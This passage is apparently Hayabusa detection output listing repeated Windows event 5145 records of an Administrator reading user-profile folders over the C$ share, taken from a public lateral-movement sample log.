0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 
23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 